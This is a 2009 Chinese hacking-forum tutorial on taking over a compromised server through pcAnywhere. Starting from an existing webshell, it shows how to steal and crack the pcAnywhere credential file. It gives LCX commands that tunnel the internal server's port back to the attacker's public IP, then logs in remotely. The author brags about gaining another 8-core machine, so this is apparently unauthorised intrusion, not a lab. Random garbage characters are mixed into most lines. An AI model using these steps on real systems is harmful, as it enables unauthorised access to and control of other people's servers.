|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
& p2 V9 Q' D9 G( y0 j B9 F! B$ N, }3 _6 O9 I# N! E
提权方法:pcanywhere+LCX
+ U8 m: f8 _/ O$ v( W# X$ K% n6 p" j% E8 k7 Y* v
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。( i- b+ y1 W* Z9 U. n
5 M5 m2 T: ^+ M; i+ e0 h在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。# K1 p$ F |8 ?- R/ a
9 F8 Q/ O" M! Y4 x1 r! I$ l
9 r8 f+ d& w- O7 P查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。+ d5 N6 ~! G" P! Z: ^
, O8 C, q9 I$ V6 c* `
" p2 l: E# X* z1 V5 j* F呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
+ T& q" _' [. ]6 S5 g4 r* b7 @+ E$ I3 {
7 M: _! G9 Z ?) W: r Y7 @$ t8 |0 ^/ Q& y* u
9 F3 F' L" `9 l7 \
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``4 D( _7 A9 B3 W' A5 a1 a
. o% D; w( l; q! }( X5 a2 Z8 [8 J9 k, I
LCX的用法再简单说下:3 u* ?" H" ^$ b; v1 q9 n
1 I+ t% ?7 W* g
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
x/ t) R- v2 J( X3 m; ?) @* z: F* l4 m4 h/ }
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
3 N: d, U2 h. `
" |+ W, R. P7 Q% ?, C% |8 \6 G/ H7 w由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。7 o- O3 t! [/ Y: G/ b
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``8 Y2 f( k7 i* T
' a2 b6 N# J, p2 U
* U; ] k0 v4 R) l s# T
+ c4 O" Z5 e) |: z$ r. p' e# w7 {% ^; N I# R
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。) n- I! M) e) [& x- n+ E+ D% c
: K5 ]) F% X: {( ~; ~( J4 D; j$ m% l" Q# p$ j( Z" g8 |
+ m& o" H; Y3 O0 X( r* h5 U- Z1 W/ l! h9 K, F, G5 w& j$ c3 x" f* B
我们本地连接试试,输入我们刚破解的账号密码; t" T: Z9 x: Z7 `/ H
' p* P- T7 E, H' Q( S1 Y) H. x" ?; A
呵呵``连接成功,服务器不错,又一个8核^︵^
" Q4 H* h. W# `$ Q# j, J: @* M" i. Q% F3 J2 s* J5 Z0 K
# ^3 ^! l( F9 } Y3 n9 v( a4 y: P* i) w+ }, q! g8 @, ?
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
.gif)
